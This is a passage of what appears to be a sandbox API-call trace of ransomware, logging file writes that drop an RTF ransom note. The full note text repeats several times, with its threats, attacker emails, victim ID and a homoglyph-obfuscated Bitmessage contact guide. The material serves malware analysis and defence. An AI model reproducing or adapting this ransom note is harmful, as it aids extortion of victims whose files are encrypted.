h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef9408, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nJ\x8eú\x10\x11\x13\x15ÔÒÅ3'g\x18ÂÉ=)ͪõ}Ó\x14", lpUsedDefaultChar=0x0) returned 8717 [0273.354] WriteFile (in: hFile=0x294, lpBuffer=0x1ef9408*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef9408*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0273.355] CloseHandle (hObject=0x294) returned 1 [0273.355] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\#readme_eman#.rtf")) returned 0xffffffff [0273.355] GetLastError () returned 0x2 [0273.355] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0273.356] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.356] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 